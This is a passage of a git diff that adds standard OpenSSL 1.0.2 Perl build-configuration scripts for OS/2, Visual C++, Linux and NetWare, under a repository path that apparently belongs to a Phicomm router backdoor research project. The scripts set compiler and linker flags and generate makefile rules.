+	$cflags.="-g "; 
+}
+
+$obj=$shlib ? '.obj' : '.o';
+$ofile='-o ';
+
+# EXE linking stuff
+$link='${CC}';
+$lflags='${CFLAGS} -Zbsd-signals -s';
+$efile='-o ';
+$exep='.exe';
+$ex_libs="-lsocket";
+
+# static library stuff
+$mklib='ar r';
+$mlflags='';
+$ranlib="ar s";
+$plib='';
+$libp=$shlib ? ".lib" : ".a";
+$shlibp=$shlib ? ".dll" : ".a";
+$lfile='';
+
+$asm=$shlib ? 'as -Zomf' : 'as';
+$afile='-o ';
+$bn_asm_obj="";
+$bn_asm_src="";
+$des_enc_obj="";
+$des_enc_src="";
+$bf_enc_obj="";
+$bf_enc_src="";
+
+if (!$no_asm)
+	{
+	$bn_asm_obj="crypto/bn/asm/bn-os2$obj crypto/bn/asm/co-os2$obj";
+	$bn_asm_src="crypto/bn/asm/bn-os2.asm crypto/bn/asm/co-os2.asm";
+	$des_enc_obj="crypto/des/asm/d-os2$obj crypto/des/asm/y-os2$obj";
+	$des_enc_src="crypto/des/asm/d-os2.asm crypto/des/asm/y-os2.asm";
+	$bf_enc_obj="crypto/bf/asm/b-os2$obj";
+	$bf_enc_src="crypto/bf/asm/b-os2.asm";
+	$cast_enc_obj="crypto/cast/asm/c-os2$obj";
+	$cast_enc_src="crypto/cast/asm/c-os2.asm";
+	$rc4_enc_obj="crypto/rc4/asm/r4-os2$obj";
+	$rc4_enc_src="crypto/rc4/asm/r4-os2.asm";
+	$rc5_enc_obj="crypto/rc5/asm/r5-os2$obj";
+	$rc5_enc_src="crypto/rc5/asm/r5-os2.asm";
+	$md5_asm_obj="crypto/md5/asm/m5-os2$obj";
+	$md5_asm_src="crypto/md5/asm/m5-os2.asm";
+	$sha1_asm_obj="crypto/sha/asm/s1-os2$obj";
+	$sha1_asm_src="crypto/sha/asm/s1-os2.asm";
+	$rmd160_asm_obj="crypto/ripemd/asm/rm-os2$obj";
+	$rmd160_asm_src="crypto/ripemd/asm/rm-os2.asm";
+	$cflags.=" -DBN_ASM -DMD5_ASM -DSHA1_ASM -DOPENSSL_BN_ASM_PART_WORDS";
+	}
+
+if ($shlib)
+	{
+	$mlflags.=" $lflags -Zdll";
+	$lib_cflag=" -D_DLL";
+	$out_def="out_dll";
+	$tmp_def="tmp_dll";
+	}
+
+sub do_lib_rule
+	{
+	local($obj,$target,$name,$shlib)=@_;
+	local($ret,$_,$Name);
+
+	$target =~ s/\//$o/g if $o ne '/';
+	$target="$target";
+	($Name=$name) =~ tr/a-z/A-Z/;
+
+	$ret.="$target: \$(${Name}OBJ)\n";
+	if (!$shlib) 
+		{
+		$ret.="\t\$(RM) $target\n";
+		$ret.="\t\$(MKLIB) $target \$(${Name}OBJ)\n";
+		$ret.="\t\$(RANLIB) $target\n\n";
+		}
+	else
+		{
+		local($ex)=($target =~ /O_SSL/)?' $(L_CRYPTO)':'';
+		$ex.=' -lsocket';
+		$ret.="\t\$(LINK) \$(SHLIB_CFLAGS) \$(MLFLAGS) $efile$target \$(SHLIB_EX_OBJ) \$(${Name}OBJ) $ex os2/${Name}.def\n";
+		$ret.="\temximp -o $out_def/$name.a os2/${Name}.def\n";
+		$ret.="\temximp -o $out_def/$name.lib os2/${Name}.def\n\n";
+		}
+	}
+
+sub do_link_rule
+	{
+	local($target,$files,$dep_libs,$libs)=@_;
+	local($ret,$_);
+	
+	$file =~ s/\//$o/g if $o ne '/';
+	$n=&bname($target);
+	$ret.="$target: $files $dep_libs\n";
+	$ret.="\t\$(LINK) ${efile}$target \$(CFLAG) \$(LFLAGS) $files $libs\n\n";
+	return($ret);
+	}
+
+1;
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/pl/VC-32.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/pl/VC-32.pl
new file mode 100644
index 0000000..852eb30
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/pl/VC-32.pl
@@ -0,0 +1,416 @@
+#!/usr/local/bin/perl
+# VC-32.pl - unified script for Microsoft Visual C++, covering Win32,
+# Win64 and WinCE [follow $FLAVOR variable to trace the differences].
+#
+
+$ssl=	"ssleay32";
+$crypto="libeay32";
+
+if ($fips && !$shlib)
+	{
+	$crypto="libeayfips32";
+	$crypto_compat = "libeaycompat32.lib";
+	}
+else
+	{
+	$crypto="libeay32";
+	}
+
+$o='\\';
+$cp='$(PERL) util/copy.pl';
+$mkdir='$(PERL) util/mkdir-p.pl';
+$rm='del /Q';
+
+$zlib_lib="zlib1.lib";
+
+# Santize -L options for ms link
+$l_flags =~ s/-L("\[^"]+")/\/libpath:$1/g;
+$l_flags =~ s/-L(\S+)/\/libpath:$1/g;
+
+my $ff = "";
+
+# C compiler stuff
+$cc='cl';
+if ($FLAVOR =~ /WIN64/)
+    {
+    # Note that we currently don't have /WX on Win64! There is a lot of
+    # warnings, but only of two types:
+    #
+    # C4344: conversion from '__int64' to 'int/long', possible loss of data
+    # C4267: conversion from 'size_t' to 'int/long', possible loss of data
+    #
+    # Amount of latter type is minimized by aliasing strlen to function of
+    # own desing and limiting its return value to 2GB-1 (see e_os.h). As
+    # per 0.9.8 release remaining warnings were explicitly examined and
+    # considered safe to ignore.
+    # 
+    $base_cflags= " $mf_cflag";
+    my $f = $shlib || $fips ?' /MD':' /MT';
+    $opt_cflags=$f.' /Ox';
+    $dbg_cflags=$f.'d /Od -DDEBUG -D_DEBUG';
+    $lflags="/nologo /subsystem:console /opt:ref";
+
+    *::perlasm_compile_target = sub {
+	my ($target,$source,$bname)=@_;
+	my $ret;
+
+	$bname =~ s/(.*)\.[^\.]$/$1/;
+	$ret=<<___;
+\$(TMP_D)$o$bname.asm: $source
+	set ASM=\$(ASM)
+	\$(PERL) $source \$\@
+
+$target: \$(TMP_D)$o$bname.asm
+	\$(ASM) $afile\$\@ \$(TMP_D)$o$bname.asm
+
+___
+	}
+    }
+elsif ($FLAVOR =~ /CE/)
+    {
+    # sanity check
+    die '%OSVERSION% is not defined'	if (!defined($ENV{'OSVERSION'}));
+    die '%PLATFORM% is not defined'	if (!defined($ENV{'PLATFORM'}));
+    die '%TARGETCPU% is not defined'	if (!defined($ENV{'TARGETCPU'}));
+
+    #
+    # Idea behind this is to mimic flags set by eVC++ IDE...
+    #
+    $wcevers = $ENV{'OSVERSION'};			# WCENNN
+    die '%OSVERSION% value is insane'	if ($wcevers !~ /^WCE([1-9])([0-9]{2})$/);
+    $wcecdefs = "-D_WIN32_WCE=$1$2 -DUNDER_CE=$1$2";	# -D_WIN32_WCE=NNN
+    $wcelflag = "/subsystem:windowsce,$1.$2";		# ...,N.NN
+
+    $wceplatf =  $ENV{'PLATFORM'};
+    $wceplatf =~ tr/a-z0-9 /A-Z0-9_/d;
+    $wcecdefs .= " -DWCE_PLATFORM_$wceplatf";
+
+    $wcetgt = $ENV{'TARGETCPU'};	# just shorter name...
+    SWITCH: for($wcetgt) {
+	/^X86/		&& do {	$wcecdefs.=" -Dx86 -D_X86_ -D_i386_ -Di_386_";
+				$wcelflag.=" /machine:X86";	last; };
+	/^ARMV4[IT]/	&& do { $wcecdefs.=" -DARM -D_ARM_ -D$wcetgt";
+				$wcecdefs.=" -DTHUMB -D_THUMB_" if($wcetgt=~/T$/);
+				$wcecdefs.=" -QRarch4T -QRinterwork-return";
+				$wcelflag.=" /machine:THUMB";	last; };
+	/^ARM/		&& do {	$wcecdefs.=" -DARM -D_ARM_ -D$wcetgt";
+				$wcelflag.=" /machine:ARM";	last; };
+	/^MIPSIV/	&& do {	$wcecdefs.=" -DMIPS -D_MIPS_ -DR4000 -D$wcetgt";
+				$wcecdefs.=" -D_MIPS64 -QMmips4 -QMn32";
+				$wcelflag.=" /machine:MIPSFPU";	last; };
+	/^MIPS16/	&& do {	$wcecdefs.=" -DMIPS -D_MIPS_ -DR4000 -D$wcetgt";
+				$wcecdefs.=" -DMIPSII -QMmips16";
+				$wcelflag.=" /machine:MIPS16";	last; };
+	/^MIPSII/	&& do {	$wcecdefs.=" -DMIPS -D_MIPS_ -DR4000 -D$wcetgt";
+				$wcecdefs.=" -QMmips2";
+				$wcelflag.=" /machine:MIPS";	last; };
+	/^R4[0-9]{3}/	&& do {	$wcecdefs.=" -DMIPS -D_MIPS_ -DR4000";
+				$wcelflag.=" /machine:MIPS";	last; };
+	/^SH[0-9]/	&& do {	$wcecdefs.=" -D$wcetgt -D_$wcetgt_ -DSHx";
+				$wcecdefs.=" -Qsh4" if ($wcetgt =~ /^SH4/);
+				$wcelflag.=" /machine:$wcetgt";	last; };
+	{ $wcecdefs.=" -D$wcetgt -D_$wcetgt_";
+	  $wcelflag.=" /machine:$wcetgt";			last; };
+    }
+
+    $cc=($ENV{CC} or "cl");
+    $base_cflags=' /W3 /WX /GF /Gy /nologo -DUNICODE -D_UNICODE -DOPENSSL_SYSNAME_WINCE -DWIN32_LEAN_AND_MEAN -DL_ENDIAN -DDSO_WIN32 -DNO_CHMOD -DOPENSSL_SMALL_FOOTPRINT';
+    $base_cflags.=" $wcecdefs";
+    $base_cflags.=' -I$(WCECOMPAT)/include'		if (defined($ENV{'WCECOMPAT'}));
+    $base_cflags.=' -I$(PORTSDK_LIBPATH)/../../include'	if (defined($ENV{'PORTSDK_LIBPATH'}));
+    if (`$cc 2>&1` =~ /Version ([0-9]+)\./ && $1>=14) {
+	$base_cflags.=$shlib?' /MD':' /MT';
+    } else {
+	$base_cflags.=' /MC';
+    }
+    $opt_cflags=' /O1i';	# optimize for space, but with intrinsics...
+    $dbg_cflags=' /Od -DDEBUG -D_DEBUG';
+    $lflags="/nologo /opt:ref $wcelflag";
+    }
+else	# Win32
+    {
+    $base_cflags= " $mf_cflag";
+    my $f = $shlib || $fips ?' /MD':' /MT';
+    $ff = "/fixed";
+    $opt_cflags=$f.' /Ox /O2 /Ob2';
+    $dbg_cflags=$f.'d /Od -DDEBUG -D_DEBUG';
+    $lflags="/nologo /subsystem:console /opt:ref";
+    }
+$lib_cflag='/Zl' if (!$shlib);	# remove /DEFAULTLIBs from static lib
+$mlflags='';
+
+$out_def ="out32";	$out_def.="dll"			if ($shlib);
+			$out_def.='_$(TARGETCPU)'	if ($FLAVOR =~ /CE/);
+$tmp_def ="tmp32";	$tmp_def.="dll"			if ($shlib);
+			$tmp_def.='_$(TARGETCPU)'	if ($FLAVOR =~ /CE/);
+$inc_def="inc32";
+
+if ($debug)
+	{
+	$cflags=$dbg_cflags.$base_cflags;
+	}
+else
+	{
+	$cflags=$opt_cflags.$base_cflags;
+	}
+
+# generate symbols.pdb unconditionally
+$app_cflag.=" /Zi /Fd\$(TMP_D)/app";
+$lib_cflag.=" /Zi /Fd\$(TMP_D)/lib";
+$lflags.=" /debug";
+
+$obj='.obj';
+$asm_suffix='.asm';
+$ofile="/Fo";
+
+# EXE linking stuff
+$link="link";
+$rsc="rc";
+$efile="/out:";
+$exep='.exe';
+if ($no_sock)		{ $ex_libs=''; }
+elsif ($FLAVOR =~ /CE/)	{ $ex_libs='ws2.lib'; }
+else			{ $ex_libs='ws2_32.lib'; }
+
+if ($FLAVOR =~ /CE/)
+	{
+	$ex_libs.=' crypt32.lib';	# for e_capi.c
+	if (defined($ENV{WCECOMPAT}))
+		{
+		$ex_libs.= ' $(WCECOMPAT)/lib';
+		if (-f "$ENV{WCECOMPAT}/lib/$ENV{TARGETCPU}/wcecompatex.lib")
+			{
+			$ex_libs.='/$(TARGETCPU)/wcecompatex.lib';
+			}
+		else
+			{
+			$ex_libs.='/wcecompatex.lib';
+			}
+		}
+	$ex_libs.=' $(PORTSDK_LIBPATH)/portlib.lib'	if (defined($ENV{'PORTSDK_LIBPATH'}));
+	$ex_libs.=' /nodefaultlib coredll.lib corelibc.lib' if ($ENV{'TARGETCPU'} eq "X86");
+	}
+else
+	{
+	$ex_libs.=' gdi32.lib advapi32.lib crypt32.lib user32.lib';
+	$ex_libs.=' bufferoverflowu.lib' if ($FLAVOR =~ /WIN64/ and `cl 2>&1` =~ /14\.00\.4[0-9]{4}\./);
+	# WIN32 UNICODE build gets linked with unicows.lib for
+	# backward compatibility with Win9x.
+	$ex_libs="unicows.lib $ex_libs" if ($FLAVOR =~ /WIN32/ and $cflags =~ /\-DUNICODE/);
+	}
+
+# static library stuff
+$mklib='lib /nologo';
+$ranlib='';
+$plib="";
+$libp=".lib";
+$shlibp=($shlib)?".dll":".lib";
+$lfile='/out:';
+
+$shlib_ex_obj="";
+$app_ex_obj="setargv.obj" if ($FLAVOR !~ /CE/);
+if ($FLAVOR =~ /WIN64A/) {
+	if (`nasm -v 2>NUL` =~ /NASM version ([0-9]+\.[0-9]+)/ && $1 >= 2.0) {
+		$asm='nasm -f win64 -DNEAR -Ox -g';
+		$afile='-o ';
+	} else {
+		$asm='ml64 /c /Cp /Cx /Zi';
+		$afile='/Fo';
+	}
+} elsif ($FLAVOR =~ /WIN64I/) {
+	$asm='ias -d debug';
+	$afile="-o ";
+} elsif ($nasm) {
+	my $ver=`nasm -v 2>NUL`;
+	my $vew=`nasmw -v 2>NUL`;
+	# pick newest version
+	$asm=($ver ge $vew?"nasm":"nasmw")." -f win32";
+	$asmtype="win32n";
+	$afile='-o ';
+} else {
+	$asm='ml /nologo /Cp /coff /c /Cx /Zi';
+	$afile='/Fo';
+	$asmtype="win32";
+}
+
+$bn_asm_obj='';
+$bn_asm_src='';
+$des_enc_obj='';
+$des_enc_src='';
+$bf_enc_obj='';
+$bf_enc_src='';
+
+if (!$no_asm)
+	{
+	win32_import_asm($mf_bn_asm, "bn", \$bn_asm_obj, \$bn_asm_src);
+	win32_import_asm($mf_aes_asm, "aes", \$aes_asm_obj, \$aes_asm_src);
+	win32_import_asm($mf_des_asm, "des", \$des_enc_obj, \$des_enc_src);
+	win32_import_asm($mf_bf_asm, "bf", \$bf_enc_obj, \$bf_enc_src);
+	win32_import_asm($mf_cast_asm, "cast", \$cast_enc_obj, \$cast_enc_src);
+	win32_import_asm($mf_rc4_asm, "rc4", \$rc4_enc_obj, \$rc4_enc_src);
+	win32_import_asm($mf_rc5_asm, "rc5", \$rc5_enc_obj, \$rc5_enc_src);
+	win32_import_asm($mf_md5_asm, "md5", \$md5_asm_obj, \$md5_asm_src);
+	win32_import_asm($mf_sha_asm, "sha", \$sha1_asm_obj, \$sha1_asm_src);
+	win32_import_asm($mf_rmd_asm, "ripemd", \$rmd160_asm_obj, \$rmd160_asm_src);
+	win32_import_asm($mf_wp_asm, "whrlpool", \$whirlpool_asm_obj, \$whirlpool_asm_src);
+	win32_import_asm($mf_cpuid_asm, "", \$cpuid_asm_obj, \$cpuid_asm_src);
+	$perl_asm = 1;
+	}
+
+if ($shlib && $FLAVOR !~ /CE/)
+	{
+	$mlflags.=" $lflags /dll";
+	$lib_cflag.=" -D_WINDLL";
+	#
+	# Engage Applink...
+	#
+	$app_ex_obj.=" \$(OBJ_D)\\applink.obj /implib:\$(TMP_D)\\junk.lib";
+	$cflags.=" -DOPENSSL_USE_APPLINK -I.";
+	# I'm open for better suggestions than overriding $banner...
+	$banner=<<'___';
+	@echo Building OpenSSL
+
+$(OBJ_D)\applink.obj:	ms\applink.c
+	$(CC) /Fo$(OBJ_D)\applink.obj $(APP_CFLAGS) -c ms\applink.c
+$(OBJ_D)\uplink.obj:	ms\uplink.c ms\applink.c
+	$(CC) /Fo$(OBJ_D)\uplink.obj $(SHLIB_CFLAGS) -c ms\uplink.c
+$(INCO_D)\applink.c:	ms\applink.c
+	$(CP) ms\applink.c $(INCO_D)\applink.c
+
+EXHEADER= $(EXHEADER) $(INCO_D)\applink.c
+
+LIBS_DEP=$(LIBS_DEP) $(OBJ_D)\applink.obj
+CRYPTOOBJ=$(OBJ_D)\uplink.obj $(CRYPTOOBJ)
+___
+	$banner.=<<'___' if ($FLAVOR =~ /WIN64/);
+CRYPTOOBJ=ms\uptable.obj $(CRYPTOOBJ)
+___
+	}
+elsif ($shlib && $FLAVOR =~ /CE/)
+	{
+	$mlflags.=" $lflags /dll";
+	$lflags.=' /entry:mainCRTstartup' if(defined($ENV{'PORTSDK_LIBPATH'}));
+	$lib_cflag.=" -D_WINDLL -D_DLL";
+	}
+
+sub do_lib_rule
+	{
+	my($objs,$target,$name,$shlib,$ign,$base_addr) = @_;
+	local($ret);
+
+	$taget =~ s/\//$o/g if $o ne '/';
+	my $base_arg;
+	if ($base_addr ne "")
+		{
+		$base_arg= " /base:$base_addr";
+		}
+	else
+		{
+		$base_arg = "";
+		}
+	if ($name ne "")
+		{
+		$name =~ tr/a-z/A-Z/;
+		$name = "/def:ms/${name}.def";
+		}
+
+#	$target="\$(LIB_D)$o$target";
+#	$ret.="$target: $objs\n";
+	if (!$shlib)
+		{
+#		$ret.="\t\$(RM) \$(O_$Name)\n";
+		$ret.="$target: $objs\n";
+		$ret.="\t\$(MKLIB) $lfile$target @<<\n  $objs\n<<\n";
+		}
+	else
+		{
+		local($ex)=($target =~ /O_CRYPTO/)?'':' $(L_CRYPTO)';
+		$ex.=" $zlib_lib" if $zlib_opt == 1 && $target =~ /O_CRYPTO/;
+
+ 		if ($fips && $target =~ /O_CRYPTO/)
+			{
+			$ret.="$target: $objs \$(PREMAIN_DSO_EXE)";
+			$ret.="\n\tSET FIPS_LINK=\$(LINK)\n";
+			$ret.="\tSET FIPS_CC=\$(CC)\n";
+			$ret.="\tSET FIPS_CC_ARGS=/Fo\$(OBJ_D)${o}fips_premain.obj \$(SHLIB_CFLAGS) -c\n";
+			$ret.="\tSET PREMAIN_DSO_EXE=\$(PREMAIN_DSO_EXE)\n";
+			$ret.="\tSET FIPS_SHA1_EXE=\$(FIPS_SHA1_EXE)\n";
+			$ret.="\tSET FIPS_TARGET=$target\n";
+			$ret.="\tSET FIPSLIB_D=\$(FIPSLIB_D)\n";
+			$ret.="\t\$(FIPSLINK) \$(MLFLAGS) $ff /map $base_arg $efile$target ";
+			$ret.="$name @<<\n  \$(SHLIB_EX_OBJ) $objs \$(EX_LIBS) ";
+			$ret.="\$(OBJ_D)${o}fips_premain.obj $ex\n<<\n";
+			}
+		else
+			{
+			$ret.="$target: $objs";
+			$ret.="\n\t\$(LINK) \$(MLFLAGS) $efile$target $name @<<\n  \$(SHLIB_EX_OBJ) $objs $ex \$(EX_LIBS)\n<<\n";
+			}
+		$ret.="\tIF EXIST \$@.manifest mt -nologo -manifest \$@.manifest -outputresource:\$@;2\n\n";
+		}
+	$ret.="\n";
+	return($ret);
+	}
+
+sub do_link_rule
+	{
+	my($target,$files,$dep_libs,$libs,$standalone)=@_;
+	local($ret,$_);
+	$file =~ s/\//$o/g if $o ne '/';
+	$n=&bname($targer);
+	$ret.="$target: $files $dep_libs\n";
+	if ($standalone == 1)
+		{
+		$ret.="  \$(LINK) \$(LFLAGS) $efile$target @<<\n\t";
+		$ret.= "\$(EX_LIBS) " if ($files =~ /O_FIPSCANISTER/ && !$fipscanisterbuild);
+		$ret.="$files $libs\n<<\n";
+		}
+	elsif ($standalone == 2)
+		{
+		$ret.="\tSET FIPS_LINK=\$(LINK)\n";
+		$ret.="\tSET FIPS_CC=\$(CC)\n";
+		$ret.="\tSET FIPS_CC_ARGS=/Fo\$(OBJ_D)${o}fips_premain.obj \$(SHLIB_CFLAGS) -c\n";
+		$ret.="\tSET PREMAIN_DSO_EXE=\n";
+		$ret.="\tSET FIPS_TARGET=$target\n";
+		$ret.="\tSET FIPS_SHA1_EXE=\$(FIPS_SHA1_EXE)\n";
+		$ret.="\tSET FIPSLIB_D=\$(FIPSLIB_D)\n";
+		$ret.="\t\$(FIPSLINK) \$(LFLAGS) $ff /map $efile$target @<<\n";
+		$ret.="\t\$(APP_EX_OBJ) $files \$(OBJ_D)${o}fips_premain.obj $libs\n<<\n";
+		}
+	else
+		{
+		$ret.="\t\$(LINK) \$(LFLAGS) $efile$target @<<\n";
+		$ret.="\t\$(APP_EX_OBJ) $files $libs\n<<\n";
+		}
+    	$ret.="\tIF EXIST \$@.manifest mt -nologo -manifest \$@.manifest -outputresource:\$@;1\n\n";
+	return($ret);
+	}
+
+sub win32_import_asm
+	{
+	my ($mf_var, $asm_name, $oref, $sref) = @_;
+	my $asm_dir;
+	if ($asm_name eq "")
+		{
+		$asm_dir = "crypto\\";
+		}
+	else
+		{
+		$asm_dir = "crypto\\$asm_name\\asm\\";
+		}
+
+	$$oref = "";
+	$mf_var =~ s/\.o$/.obj/g;
+
+	foreach (split(/ /, $mf_var))
+		{
+		$$oref .= $asm_dir . $_ . " ";
+		}
+	$$oref =~ s/ $//;
+	$$sref = $$oref;
+	$$sref =~ s/\.obj/.asm/g;
+
+	}
+
+
+1;
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/pl/linux.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/pl/linux.pl
new file mode 100644
index 0000000..79bb8a3
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/pl/linux.pl
@@ -0,0 +1,104 @@
+#!/usr/local/bin/perl
+#
+# linux.pl - the standard unix makefile stuff.
+#
+
+$o='/';
+$cp='/bin/cp';
+$rm='/bin/rm -f';
+
+# C compiler stuff
+
+$cc='gcc';
+if ($debug)
+	{ $cflags="-g2 -ggdb -DREF_CHECK -DCRYPTO_MDEBUG"; }
+elsif ($profile)
+	{ $cflags="-pg -O3"; }
+else
+	{ $cflags="-O3 -fomit-frame-pointer"; }
+
+if (!$no_asm)
+	{
+	$bn_asm_obj='$(OBJ_D)/bn86-elf.o';
+	$bn_asm_src='crypto/bn/asm/bn86unix.cpp';
+	$bnco_asm_obj='$(OBJ_D)/co86-elf.o';
+	$bnco_asm_src='crypto/bn/asm/co86unix.cpp';
+	$des_enc_obj='$(OBJ_D)/dx86-elf.o $(OBJ_D)/yx86-elf.o';
+	$des_enc_src='crypto/des/asm/dx86unix.cpp crypto/des/asm/yx86unix.cpp';
+	$bf_enc_obj='$(OBJ_D)/bx86-elf.o';
+	$bf_enc_src='crypto/bf/asm/bx86unix.cpp';
+	$cast_enc_obj='$(OBJ_D)/cx86-elf.o';
+	$cast_enc_src='crypto/cast/asm/cx86unix.cpp';
+	$rc4_enc_obj='$(OBJ_D)/rx86-elf.o';
+	$rc4_enc_src='crypto/rc4/asm/rx86unix.cpp';
+	$rc5_enc_obj='$(OBJ_D)/r586-elf.o';
+	$rc5_enc_src='crypto/rc5/asm/r586unix.cpp';
+	$md5_asm_obj='$(OBJ_D)/mx86-elf.o';
+	$md5_asm_src='crypto/md5/asm/mx86unix.cpp';
+	$rmd160_asm_obj='$(OBJ_D)/rm86-elf.o';
+	$rmd160_asm_src='crypto/ripemd/asm/rm86unix.cpp';
+	$sha1_asm_obj='$(OBJ_D)/sx86-elf.o';
+	$sha1_asm_src='crypto/sha/asm/sx86unix.cpp';
+	$cflags.=" -DBN_ASM -DMD5_ASM -DSHA1_ASM -DOPENSSL_BN_ASM_PART_WORDS";
+	}
+
+$cflags.=" -DTERMIOS -DL_ENDIAN -m486 -Wall";
+
+if ($shlib)
+	{
+	$shl_cflag=" -DPIC -fpic";
+	$shlibp=".so.$ssl_version";
+	$so_shlibp=".so";
+	}
+
+sub do_shlib_rule
+	{
+	local($obj,$target,$name,$shlib,$so_name)=@_;
+	local($ret,$_,$Name);
+
+	$target =~ s/\//$o/g if $o ne '/';
+	($Name=$name) =~ tr/a-z/A-Z/;
+
+	$ret.="$target: \$(${Name}OBJ)\n";
+	$ret.="\t\$(RM) target\n";
+	$ret.="\tgcc \${CFLAGS} -shared -Wl,-soname,$target -o $target \$(${Name}OBJ)\n";
+	($t=$target) =~ s/(^.*)\/[^\/]*$/$1/;
+	if ($so_name ne "")
+		{
+		$ret.="\t\$(RM) \$(LIB_D)$o$so_name\n";
+		$ret.="\tln -s $target \$(LIB_D)$o$so_name\n\n";
+		}
+	}
+
+sub do_link_rule
+	{
+	local($target,$files,$dep_libs,$libs)=@_;
+	local($ret,$_);
+	
+	$file =~ s/\//$o/g if $o ne '/';
+	$n=&bname($target);
+	$ret.="$target: $files $dep_libs\n";
+	$ret.="\t\$(LINK) ${efile}$target \$(LFLAGS) $files $libs\n\n";
+	return($ret);
+	}
+
+sub do_asm_rule
+	{
+	local($target,$src)=@_;
+	local($ret,@s,@t,$i);
+
+	$target =~ s/\//$o/g if $o ne "/";
+	$src =~ s/\//$o/g if $o ne "/";
+
+	@s=split(/\s+/,$src);
+	@t=split(/\s+/,$target);
+
+	for ($i=0; $i<=$#s; $i++)
+		{
+		$ret.="$t[$i]: $s[$i]\n";
+		$ret.="\tgcc -E -DELF \$(SRC_D)$o$s[$i]|\$(AS) $afile$t[$i]\n\n";
+		}
+	return($ret);
+	}
+
+1;
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/pl/netware.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/pl/netware.pl
new file mode 100644
index 0000000..fe80a9b
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/pl/netware.pl
@@ -0,0 +1,532 @@
+# Metrowerks Codewarrior or gcc / nlmconv for NetWare
+#
+
+$version_header = "crypto/opensslv.h";
+open(IN, "$version_header") or die "Couldn't open $version_header: $!";
+while (<IN>) {
+  if (/^#define[\s\t]+OPENSSL_VERSION_NUMBER[\s\t]+0x(\d)(\d{2})(\d{2})(\d{2})/)
+  {
+    # die "OpenSSL version detected: $1.$2.$3.$4\n";
+    #$nlmvernum = "$1,$2,$3";
+    $nlmvernum = "$1,".($2*10+$3).",".($4*1);
+    #$nlmverstr = "$1.".($2*1).".".($3*1).($4?(chr(96+$4)):"");
+    break;
+  }
+}
+close(IN) or die "Couldn't close $version_header: $!";
+
+$readme_file = "README";
+open(IN, $readme_file) or die "Couldn't open $readme_file: $!";
+while (<IN>) {
+  if (/^[\s\t]+OpenSSL[\s\t]+(\d)\.(\d{1,2})\.(\d{1,2})([a-z])(.*)/)
+  {
+    #$nlmvernum = "$1,$2,$3";
+    #$nlmvernum = "$1,".($2*10+$3).",".($4*1);
+    $nlmverstr = "$1.$2.$3$4$5";
+  }
+  elsif (/^[\s\t]+(Copyright \(c\) \d{4}\-\d{4} The OpenSSL Project)$/)
+  {
+    $nlmcpystr = $1;
+  }
+  break if ($nlmvernum && $nlmcpystr);
+}
+close(IN) or die "Couldn't close $readme_file: $!";
+
+# Define stacksize here
+$nlmstack = "32768";
+
+# some default settings here in case we failed to find them in README
+$nlmvernum = "1,0,0" if (!$nlmvernum);
+$nlmverstr = "OpenSSL" if (!$nlmverstr);
+$nlmcpystr = "Copyright (c) 1998-now The OpenSSL Project" if (!$nlmcpystr);
+
+# die "OpenSSL copyright: $nlmcpystr\nOpenSSL verstring: $nlmverstr\nOpenSSL vernumber: $nlmvernum\n";
+
+# The import files and other misc imports needed to link
+@misc_imports = ("GetProcessSwitchCount", "RunningProcess",
+                 "GetSuperHighResolutionTimer");
+if ($LIBC)
+{
+   @import_files = ("libc.imp");
+   @module_files = ("libc");
+   $libarch = "LIBC";
+}
+else
+{
+   # clib build
+   @import_files = ("clib.imp");
+   push(@import_files, "socklib.imp") if ($BSDSOCK);
+   @module_files = ("clib");
+   # push(@misc_imports, "_rt_modu64%16", "_rt_divu64%16");
+   $libarch = "CLIB";
+}
+if ($BSDSOCK)
+{
+   $libarch .= "-BSD";
+}
+else
+{
+   $libarch .= "-WS2";
+   push(@import_files, "ws2nlm.imp");
+}
+
+# The "IMPORTS" environment variable must be set and point to the location
+# where import files (*.imp) can be found.
+# Example:  set IMPORTS=c:\ndk\nwsdk\imports
+$import_path = $ENV{"IMPORTS"} || die ("IMPORTS environment variable not set\n");
+
+
+# The "PRELUDE" environment variable must be set and point to the location
+# and name of the prelude source to link with ( nwpre.obj is recommended ).
+# Example: set PRELUDE=c:\codewar\novell support\metrowerks support\libraries\runtime\nwpre.obj
+$prelude = $ENV{"PRELUDE"} || die ("PRELUDE environment variable not set\n");
+
+# The "INCLUDES" environment variable must be set and point to the location
+# where import files (*.imp) can be found.
+$include_path = $ENV{"INCLUDE"} || die ("INCLUDES environment variable not set\n");
+$include_path =~ s/\\/\//g;
+$include_path = join(" -I", split(/;/, $include_path));
+
+# check for gcc compiler
+$gnuc = $ENV{"GNUC"};
+
+#$ssl=   "ssleay32";
+#$crypto="libeay32";
+
+if ($gnuc)
+{
+   # C compiler
+   $cc='gcc';
+   # Linker
+   $link='nlmconv';
+   # librarian
+   $mklib='ar';
+   $o='/';
+   # cp command
+   $cp='cp -af';
+   # rm command
+   $rm='rm -f';
+   # mv command
+   $mv='mv -f';
+   # mkdir command
+   $mkdir='gmkdir';
+   #$ranlib='ranlib';
+}
+else
+{
+   # C compiler
+   $cc='mwccnlm';
+   # Linker
+   $link='mwldnlm';
+   # librarian
+   $mklib='mwldnlm';
+   # Path separator
+   $o='\\';
+   # cp command
+   $cp='copy >nul:';
+   # rm command
+   $rm='del /f /q';
+}
+
+# assembler
+if ($nw_nasm)
+{
+   $asm=(`nasm -v 2>NUL` gt `nasmw -v 2>NUL`?"nasm":"nasmw");
+   if ($gnuc)
+   {
+      $asm.=" -s -f elf";
+   }
+   else
+   {
+      $asm.=" -s -f coff -d __coff__";
+   }
+   $afile="-o ";
+   $asm.=" -g" if $debug;
+}
+elsif ($nw_mwasm)
+{
+   $asm="mwasmnlm -maxerrors 20";
+   $afile="-o ";
+   $asm.=" -g" if $debug;
+}
+elsif ($nw_masm)
+{
+# masm assembly settings - it should be possible to use masm but haven't
+# got it working.
+# $asm='ml /Cp /coff /c /Cx';
+# $asm.=" /Zi" if $debug;
+# $afile='/Fo';
+   die("Support for masm assembler not yet functional\n");
+}
+else
+{
